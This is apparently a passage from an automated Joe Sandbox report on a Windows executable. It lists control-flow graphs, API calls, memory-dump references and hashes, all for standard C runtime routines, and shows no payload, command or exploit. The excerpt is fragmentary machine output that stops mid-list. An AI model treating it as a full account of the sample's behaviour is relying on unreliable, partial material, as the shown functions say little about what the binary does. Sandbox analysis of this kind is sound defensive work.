                                            • Associated: 0000000B.00000002.2290889031.0000000000ABD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290908467.0000000000AC7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290947454.0000000000B16000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_aa0000_J9jGBSSbDD3yrTx79DzmOLls.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeLibrary
                                            • String ID: api-ms-$ext-ms-
                                            • API String ID: 3664257935-537541572
                                            • Opcode ID: f0a99232380fc632b50003a10373f237bcbf8b0278de2bbee85541afa88d8c34
                                            • Instruction ID: f101b9f6b913e7668341d7835c02d678f6e99658942dcf467439cb32145fb432
                                            • Opcode Fuzzy Hash: f0a99232380fc632b50003a10373f237bcbf8b0278de2bbee85541afa88d8c34
                                            • Instruction Fuzzy Hash: 7421E735A01210EFDB35DBA4EC41A9A3768AF43764F254234FA16A72E2EB30ED01C6D0

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 68 ab2a91-ab2aaa 69 ab2aac-ab2abc call aab34b 68->69 70 ab2ac0-ab2ac5 68->70 69->70 76 ab2abe 69->76 72 ab2ac7-ab2ad1 70->72 73 ab2ad4-ab2afa call ab3c28 70->73 72->73 78 ab2c6d-ab2c7e call aa4791 73->78 79 ab2b00-ab2b0b 73->79 76->70 81 ab2b11-ab2b16 79->81 82 ab2c60 79->82 85 ab2b2b-ab2b36 call ab1e71 81->85 86 ab2b18-ab2b21 call aa4b20 81->86 83 ab2c62 82->83 88 ab2c64-ab2c6b call aa4522 83->88 94 ab2b41-ab2b45 85->94 95 ab2b38 85->95 93 ab2b23-ab2b29 86->93 86->94 88->78 97 ab2b3e 93->97 94->83 98 ab2b4b-ab2b62 call ab3c28 94->98 95->97 97->94 98->83 101 ab2b68-ab2b7a call aaf4f2 98->101 103 ab2b7f-ab2b83 101->103 104 ab2b9e-ab2ba0 103->104 105 ab2b85-ab2b8d 103->105 104->83 106 ab2b8f-ab2b94 105->106 107 ab2bc7-ab2bd3 105->107 108 ab2b9a-ab2b9c 106->108 109 ab2c46-ab2c48 106->109 110 ab2c52 107->110 111 ab2bd5-ab2bd7 107->111 108->104 112 ab2ba5-ab2bbf call aaf4f2 108->112 109->88 115 ab2c54-ab2c5b call aa4522 110->115 113 ab2bd9-ab2be2 call aa4b20 111->113 114 ab2bec-ab2bf7 call ab1e71 111->114 112->109 124 ab2bc5 112->124 113->115 125 ab2be4-ab2bea 113->125 114->115 126 ab2bf9 114->126 115->104 124->104 127 ab2bff-ab2c04 125->127 126->127 127->115 128 ab2c06-ab2c1e call aaf4f2 127->128 128->115 131 ab2c20-ab2c27 128->131 132 ab2c4a-ab2c50 131->132 133 ab2c29-ab2c2a 131->133 134 ab2c2b-ab2c3d call ab3ca4 132->134 133->134 134->115 137 ab2c3f-ab2c45 call aa4522 134->137 137->109
                                            APIs
                                            • __alloca_probe_16.LIBCMT ref: 00AB2B18
                                            • __alloca_probe_16.LIBCMT ref: 00AB2BD9
                                            • __freea.LIBCMT ref: 00AB2C40
                                              • Part of subcall function 00AB1E71: HeapAlloc.KERNEL32(00000000,00000000,?,?,00AA5315,?,?,?,?,?,00AA10FC,?,00000001), ref: 00AB1EA3
                                            • __freea.LIBCMT ref: 00AB2C55
                                            • __freea.LIBCMT ref: 00AB2C65
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2290862399.0000000000AA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AA0000, based on PE: true
                                            • Associated: 0000000B.00000002.2290839895.0000000000AA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290889031.0000000000ABD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290908467.0000000000AC7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290947454.0000000000B16000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_aa0000_J9jGBSSbDD3yrTx79DzmOLls.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __freea$__alloca_probe_16$AllocHeap
                                            • String ID:
                                            • API String ID: 1096550386-0
                                            • Opcode ID: 305365418d8c146a3da2c1a74281f10121af569edb4adf962942c7963c2158b8
                                            • Instruction ID: d20f895dffca2b2f1c0f3720af36a701fe5cd72cc6e4f7b1cf19be1f6504e556
                                            • Opcode Fuzzy Hash: 305365418d8c146a3da2c1a74281f10121af569edb4adf962942c7963c2158b8
                                            • Instruction Fuzzy Hash: BD515C72600216ABEB259FA48D82FFF7BADEB49750B15012AFD08E7152EB71DD108760

                                            Control-flow Graph

                                            APIs
                                            • GetCurrentProcess.KERNEL32(?,?,00AAC153,00000016,00AA8E0A,?,?,5E2ACE94,00AA8E0A,?), ref: 00AAC16A
                                            • TerminateProcess.KERNEL32(00000000,?,00AAC153,00000016,00AA8E0A,?,?,5E2ACE94,00AA8E0A,?), ref: 00AAC171
                                            • ExitProcess.KERNEL32 ref: 00AAC183
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2290862399.0000000000AA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AA0000, based on PE: true
                                            • Associated: 0000000B.00000002.2290839895.0000000000AA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290889031.0000000000ABD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290908467.0000000000AC7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290947454.0000000000B16000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_aa0000_J9jGBSSbDD3yrTx79DzmOLls.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process$CurrentExitTerminate
                                            • String ID:
                                            • API String ID: 1703294689-0
                                            • Opcode ID: c2cbf82e12bf075cc921e47204e0e3944a32d5b4e6065a921d8c27ea37fd7184
                                            • Instruction ID: 4384a26abd7e56fe82622be63af6ba991cdeb20ba42b932c4477e5f8d1a92907
                                            • Opcode Fuzzy Hash: c2cbf82e12bf075cc921e47204e0e3944a32d5b4e6065a921d8c27ea37fd7184
                                            • Instruction Fuzzy Hash: A0D09E31104104ABDF027FB0DD0D9593F26BF42351F444220B90A8B073DB3299539A90

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 147 ab4daf-ab4dd7 call ab48df 150 ab4f9f-ab4fa0 call ab4950 147->150 151 ab4ddd-ab4de3 147->151 154 ab4fa5-ab4fa7 150->154 153 ab4de6-ab4dec 151->153 155 ab4eee-ab4f0d call aa5f00 153->155 156 ab4df2-ab4dfe 153->156 158 ab4fa8-ab4fb6 call aa4791 154->158 164 ab4f10-ab4f15 155->164 156->153 159 ab4e00-ab4e06 156->159 162 ab4e0c-ab4e18 IsValidCodePage 159->162 163 ab4ee6-ab4ee9 159->163 162->163 166 ab4e1e-ab4e25 162->166 163->158 167 ab4f52-ab4f5c 164->167 168 ab4f17-ab4f1c 164->168 169 ab4e4d-ab4e5a GetCPInfo 166->169 170 ab4e27-ab4e33 166->170 167->164 171 ab4f5e-ab4f88 call ab48a1 167->171 175 ab4f4f 168->175 176 ab4f1e-ab4f26 168->176 173 ab4eda-ab4ee0 169->173 174 ab4e5c-ab4e7b call aa5f00 169->174 172 ab4e37-ab4e43 call ab49b3 170->172 186 ab4f89-ab4f98 171->186 183 ab4e48 172->183 173->150 173->163 174->172 187 ab4e7d-ab4e84 174->187 175->167 180 ab4f28-ab4f2b 176->180 181 ab4f47-ab4f4d 176->181 185 ab4f2d-ab4f33 180->185 181->168 181->175 183->154 185->181 188 ab4f35-ab4f45 185->188 186->186 189 ab4f9a 186->189 190 ab4eb0-ab4eb3 187->190 191 ab4e86-ab4e8b 187->191 188->181 188->185 189->150 193 ab4eb8-ab4ebf 190->193 191->190 192 ab4e8d-ab4e95 191->192 194 ab4ea8-ab4eae 192->194 195 ab4e97-ab4e9e 192->195 193->193 196 ab4ec1-ab4ed5 call ab48a1 193->196 194->190 194->191 198 ab4e9f-ab4ea6 195->198 196->172 198->194 198->198
                                            APIs
                                              • Part of subcall function 00AB48DF: GetOEMCP.KERNEL32(00000000,?,?,00000000,?), ref: 00AB490A
                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00AB4BF6,?,00000000,?,00000000,?), ref: 00AB4E10
                                            • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00AB4BF6,?,00000000,?,00000000,?), ref: 00AB4E52
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2290862399.0000000000AA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AA0000, based on PE: true
                                            • Associated: 0000000B.00000002.2290839895.0000000000AA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290889031.0000000000ABD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290908467.0000000000AC7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290947454.0000000000B16000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_aa0000_J9jGBSSbDD3yrTx79DzmOLls.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CodeInfoPageValid
                                            • String ID:
                                            • API String ID: 546120528-0
                                            • Opcode ID: cca1967ede024d4a3fc45d0a29835bf518923bb35de76b6b3fcceb1ce04f351f
                                            • Instruction ID: c2cd785d04adc533ec218f9be2babe73412734dd883bb3421150422503c6446d
                                            • Opcode Fuzzy Hash: cca1967ede024d4a3fc45d0a29835bf518923bb35de76b6b3fcceb1ce04f351f
                                            • Instruction Fuzzy Hash: 3651F070A002459EDB21CF75C881AFABBF9FF89304F18856ED0868B253E775D906CB50

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 200 aaf4f2-aaf501 call aaf024 203 aaf52a-aaf544 call aaf54f LCMapStringW 200->203 204 aaf503-aaf528 LCMapStringEx 200->204 208 aaf54a-aaf54c 203->208 204->208
                                            APIs
                                            • LCMapStringEx.KERNELBASE(?,00AB2B7F,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00AAF526
                                            • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00AB2B7F,?,?,00000000,?,00000000), ref: 00AAF544
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2290862399.0000000000AA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AA0000, based on PE: true
                                            • Associated: 0000000B.00000002.2290839895.0000000000AA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290889031.0000000000ABD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290908467.0000000000AC7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290947454.0000000000B16000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_aa0000_J9jGBSSbDD3yrTx79DzmOLls.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: String
                                            • String ID:
                                            • API String ID: 2568140703-0
                                            • Opcode ID: 27de436f5a4217da28d8ec0286e7c1c8ed9fa969634321409094e237c29b98dc
                                            • Instruction ID: 816d6f8408b9ab45075e87d7b8f63f0304569d548ef4841d55a3d2e2a56ca1a2
                                            • Opcode Fuzzy Hash: 27de436f5a4217da28d8ec0286e7c1c8ed9fa969634321409094e237c29b98dc
                                            • Instruction Fuzzy Hash: 12F0683640011ABBCF166FD0DC059DE3F66FB49761F058120FA1926061D732C972AB90

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 209 ab49b3-ab49d5 210 ab49db-ab49ed GetCPInfo 209->210 211 ab4aee-ab4b14 209->211 210->211 213 ab49f3-ab49fa 210->213 212 ab4b19-ab4b1e 211->212 214 ab4b28-ab4b2e 212->214 215 ab4b20-ab4b26 212->215 216 ab49fc-ab4a06 213->216 218 ab4b3a 214->218 219 ab4b30-ab4b33 214->219 217 ab4b36-ab4b38 215->217 216->216 220 ab4a08-ab4a1b 216->220 222 ab4b3c-ab4b4e 217->222 218->222 219->217 221 ab4a3c-ab4a3e 220->221 223 ab4a1d-ab4a24 221->223 224 ab4a40-ab4a77 call ab2988 call ab2c7f 221->224 222->212 225 ab4b50-ab4b5e call aa4791 222->225 226 ab4a33-ab4a35 223->226 235 ab4a7c-ab4ab1 call ab2c7f 224->235 229 ab4a37-ab4a3a 226->229 230 ab4a26-ab4a28 226->230 229->221 230->229 233 ab4a2a-ab4a32 230->233 233->226 238 ab4ab3-ab4abd 235->238 239 ab4acb-ab4acd 238->239 240 ab4abf-ab4ac9 238->240 241 ab4adb 239->241 242 ab4acf-ab4ad9 239->242 243 ab4add-ab4aea 240->243 241->243 242->243 243->238 244 ab4aec 243->244 244->225
                                            APIs
                                            • GetCPInfo.KERNEL32(E8458D00,?,00AB4C02,00AB4BF6,00000000), ref: 00AB49E5
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2290862399.0000000000AA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AA0000, based on PE: true
                                            • Associated: 0000000B.00000002.2290839895.0000000000AA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290889031.0000000000ABD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290908467.0000000000AC7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290947454.0000000000B16000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_aa0000_J9jGBSSbDD3yrTx79DzmOLls.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Info
                                            • String ID:
                                            • API String ID: 1807457897-0
                                            • Opcode ID: ca53d738787c85ca93fa070d30ceea587c201c8544ef7455cc40b5b8805acd35
                                            • Instruction ID: 43188c7f9606c4435093f5e3362e3f408ca4ded642e06c201c368f5283ce4059
                                            • Opcode Fuzzy Hash: ca53d738787c85ca93fa070d30ceea587c201c8544ef7455cc40b5b8805acd35
                                            • Instruction Fuzzy Hash: A85149715042589EDB218F28CD80BEA7BBCEB5A344F2405EDE59AD7183D335AD46DF20

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 245 aaf123-aaf14b 246 aaf14d-aaf14f 245->246 247 aaf151-aaf153 245->247 248 aaf1a2-aaf1a5 246->248 249 aaf159-aaf160 call aaf058 247->249 250 aaf155-aaf157 247->250 252 aaf165-aaf169 249->252 250->248 253 aaf16b-aaf179 GetProcAddress 252->253 254 aaf188-aaf19f 252->254 253->254 255 aaf17b-aaf186 call aab8da 253->255 256 aaf1a1 254->256 255->256 256->248
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2290862399.0000000000AA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AA0000, based on PE: true
                                            • Associated: 0000000B.00000002.2290839895.0000000000AA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290889031.0000000000ABD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290908467.0000000000AC7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290947454.0000000000B16000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_aa0000_J9jGBSSbDD3yrTx79DzmOLls.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f797323832b831bf4872f51afbbeae1e1c869caf8b4cbdbeb60736f8db82149e
                                            • Instruction ID: b67791cc2c36a5a265a2353929648664f757ea88f09b379fb2fc035f43acc44a
                                            • Opcode Fuzzy Hash: f797323832b831bf4872f51afbbeae1e1c869caf8b4cbdbeb60736f8db82149e
                                            • Instruction Fuzzy Hash: FE01B933704115DF9B19DFE9EC4195A33A6EBC63207254235FA05DB1D4DB34D8029790
                                            APIs
                                            • GetLocaleInfoW.KERNEL32(?,2000000B,00AB7964,00000002,00000000,?,?,?,00AB7964,?,00000000), ref: 00AB76DF
                                            • GetLocaleInfoW.KERNEL32(?,20001004,00AB7964,00000002,00000000,?,?,?,00AB7964,?,00000000), ref: 00AB7708
                                            • GetACP.KERNEL32(?,?,00AB7964,?,00000000), ref: 00AB771D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2290862399.0000000000AA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AA0000, based on PE: true
                                            • Associated: 0000000B.00000002.2290839895.0000000000AA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290889031.0000000000ABD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290908467.0000000000AC7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290947454.0000000000B16000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_aa0000_J9jGBSSbDD3yrTx79DzmOLls.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: InfoLocale
                                            • String ID: ACP$OCP
                                            • API String ID: 2299586839-711371036
                                            • Opcode ID: aed51caf41da6ec1e7e46b9e8be625b0c8697c3f785b619e45384eb4f884091e
                                            • Instruction ID: 5f83c863891288954a777835cd94841dce2064e308e6bfdb0a1d50f5274ec00a
                                            • Opcode Fuzzy Hash: aed51caf41da6ec1e7e46b9e8be625b0c8697c3f785b619e45384eb4f884091e
                                            • Instruction Fuzzy Hash: 5921A432608500A6D7248B68C910BDFB3AEEBD4B54F568524E80ADB513FBB2DD41D350
                                            APIs
                                              • Part of subcall function 00AAEB00: GetLastError.KERNEL32(?,00000008,00AB3006), ref: 00AAEB04
                                              • Part of subcall function 00AAEB00: SetLastError.KERNEL32(00000000,00000000,00000002,000000FF), ref: 00AAEBA6
                                            • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00AB7927
                                            • IsValidCodePage.KERNEL32(00000000), ref: 00AB7970
                                            • IsValidLocale.KERNEL32(?,00000001), ref: 00AB797F
                                            • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00AB79C7
                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00AB79E6
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2290862399.0000000000AA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AA0000, based on PE: true
                                            • Associated: 0000000B.00000002.2290839895.0000000000AA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290889031.0000000000ABD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290908467.0000000000AC7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290947454.0000000000B16000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_aa0000_J9jGBSSbDD3yrTx79DzmOLls.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                            • String ID:
                                            • API String ID: 415426439-0
                                            • Opcode ID: be987fc408490797d965fc5883676b3af480854840e55611cd568862477f3b2c
                                            • Instruction ID: f4c602583fe5353c9cdae0875542297d27a143d3b937202edd827b61a239f0fd
                                            • Opcode Fuzzy Hash: be987fc408490797d965fc5883676b3af480854840e55611cd568862477f3b2c
                                            • Instruction Fuzzy Hash: 06518071A04205AFEB50EFA5DC45AFE73BCFF84700F154529E911E7192EBB09A41CB61
                                            APIs
                                              • Part of subcall function 00AAEB00: GetLastError.KERNEL32(?,00000008,00AB3006), ref: 00AAEB04
                                              • Part of subcall function 00AAEB00: SetLastError.KERNEL32(00000000,00000000,00000002,000000FF), ref: 00AAEBA6
                                            • GetACP.KERNEL32(?,?,?,?,?,?,00AACB0C,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00AB6F78
                                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00AACB0C,?,?,?,00000055,?,-00000050,?,?), ref: 00AB6FA3
                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00AB7106
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2290862399.0000000000AA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AA0000, based on PE: true
                                            • Associated: 0000000B.00000002.2290839895.0000000000AA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290889031.0000000000ABD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290908467.0000000000AC7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290947454.0000000000B16000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_aa0000_J9jGBSSbDD3yrTx79DzmOLls.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast$CodeInfoLocalePageValid
                                            • String ID: utf8
                                            • API String ID: 607553120-905460609
                                            • Opcode ID: 21571d2ba81d73818930a17aa90ba1ba940b82de4f7f6f5fba2bcb08b79c95af
                                            • Instruction ID: e7b33ba308e11e03370c6bd46fda6e1c578b2cb0264af6129f3c674dece35a52
                                            • Opcode Fuzzy Hash: 21571d2ba81d73818930a17aa90ba1ba940b82de4f7f6f5fba2bcb08b79c95af
                                            • Instruction Fuzzy Hash: 2571C272604206AADB24BB78DD46BFA73ACEF85700F14446AF516DB183FBB4ED418760
                                            APIs
                                            • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00AA4E32
                                            • IsDebuggerPresent.KERNEL32 ref: 00AA4EFE
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00AA4F17
                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 00AA4F21
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2290862399.0000000000AA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AA0000, based on PE: true
                                            • Associated: 0000000B.00000002.2290839895.0000000000AA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290889031.0000000000ABD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290908467.0000000000AC7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290947454.0000000000B16000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_aa0000_J9jGBSSbDD3yrTx79DzmOLls.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                            • String ID:
                                            • API String ID: 254469556-0
                                            • Opcode ID: f789982de21af972e1d5fed5cbf16d84c9bfc06e8c671fde9d57a3f3ec1c94a5
                                            • Instruction ID: c13133b80f2955957d92916d4344f8df26bff89c7f5ffe725ea92d5237a71ae4
                                            • Opcode Fuzzy Hash: f789982de21af972e1d5fed5cbf16d84c9bfc06e8c671fde9d57a3f3ec1c94a5
                                            • Instruction Fuzzy Hash: 0E31F775D052189FDF20EFA4D949BCDBBB8BF08700F1041AAE40DAB290EB759A85CF45
                                            APIs
                                            • type_info::operator==.LIBVCRUNTIME ref: 00AA7DA7
                                            • ___TypeMatch.LIBVCRUNTIME ref: 00AA7EB5
                                            • _UnwindNestedFrames.LIBCMT ref: 00AA8007
                                            • CallUnexpected.LIBVCRUNTIME ref: 00AA8022
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2290862399.0000000000AA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AA0000, based on PE: true
                                            • Associated: 0000000B.00000002.2290839895.0000000000AA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290889031.0000000000ABD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290908467.0000000000AC7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290947454.0000000000B16000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_aa0000_J9jGBSSbDD3yrTx79DzmOLls.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                            • String ID: csm$csm$csm
                                            • API String ID: 2751267872-393685449
                                            • Opcode ID: 9a8fa26341a652c74c8211792d3f802790ddbff46c4d1ee71f03dd541de36635
                                            • Instruction ID: cd1c162b7e45d4802eb9e4c2fb2ff3a48cab53a5aa08fcb80bcfbca0110b6c41
                                            • Opcode Fuzzy Hash: 9a8fa26341a652c74c8211792d3f802790ddbff46c4d1ee71f03dd541de36635
                                            • Instruction Fuzzy Hash: 1AB15572804209EFCF29EFA4CD819AFBBB5BF16310F14415AE8116B292D735DA51CFA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2290862399.0000000000AA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AA0000, based on PE: true
                                            • Associated: 0000000B.00000002.2290839895.0000000000AA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290889031.0000000000ABD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290908467.0000000000AC7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290947454.0000000000B16000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_aa0000_J9jGBSSbDD3yrTx79DzmOLls.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID: 0-3907804496
                                            • Opcode ID: c6c0822cc6c9f3c6a7153a0d8bd914718848cae7c523d5c4f9989ce9bc565530
                                            • Instruction ID: e152b6c70c67bfde76bead69c9ee2250a6a7449affa178eac8f36dbd9d6ff1fd
                                            • Opcode Fuzzy Hash: c6c0822cc6c9f3c6a7153a0d8bd914718848cae7c523d5c4f9989ce9bc565530
                                            • Instruction Fuzzy Hash: 26B1E371A04285AFDB11DF98C8A0BFDBBF9BF46350F944158E441A7293CB719E42CBA0
                                            APIs
                                            • GetCPInfo.KERNEL32(01240650,01240650,?,7FFFFFFF,?,00AB9C39,01240650,01240650,?,01240650,?,?,?,?,01240650,?), ref: 00AB9A0F
                                            • __alloca_probe_16.LIBCMT ref: 00AB9ACA
                                            • __alloca_probe_16.LIBCMT ref: 00AB9B59
                                            • __freea.LIBCMT ref: 00AB9BA4
                                            • __freea.LIBCMT ref: 00AB9BAA
                                            • __freea.LIBCMT ref: 00AB9BE0
                                            • __freea.LIBCMT ref: 00AB9BE6
                                            • __freea.LIBCMT ref: 00AB9BF6
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2290862399.0000000000AA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AA0000, based on PE: true
                                            • Associated: 0000000B.00000002.2290839895.0000000000AA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290889031.0000000000ABD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290908467.0000000000AC7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290947454.0000000000B16000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_aa0000_J9jGBSSbDD3yrTx79DzmOLls.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __freea$__alloca_probe_16$Info
                                            • String ID:
                                            • API String ID: 127012223-0
                                            • Opcode ID: b9571765ad1980479591598ca1f3d929214a3ff87fcbeac8347f9a69ca92b759
                                            • Instruction ID: 88c353bbfb324ca22a597f9d2057cae6ee7bca2be7cba208ae6b9ea95a632fd2
                                            • Opcode Fuzzy Hash: b9571765ad1980479591598ca1f3d929214a3ff87fcbeac8347f9a69ca92b759
                                            • Instruction Fuzzy Hash: 3071D372900206ABDF219BA49D82FEF7BBDDF8A350F244059FA05A7283E775DD018761
                                            APIs
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00AA439F
                                            • __alloca_probe_16.LIBCMT ref: 00AA43CB
                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00AA440A
